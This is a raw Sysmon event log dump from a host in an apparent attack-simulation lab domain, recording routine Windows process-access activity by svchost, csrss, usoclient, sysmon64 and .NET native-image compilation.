13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.922{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.594{59A5CD1D-9154-6005-5D02-00000000A301}4300860C:\Windows\system32\conhost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9154-6005-5D02-00000000A301}4300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:06.578{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a48-0\System.Data.Entity.dll2021-01-18 13:47:06.578 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.391{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.391{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:07.391{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-915B-6005-5F02-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C: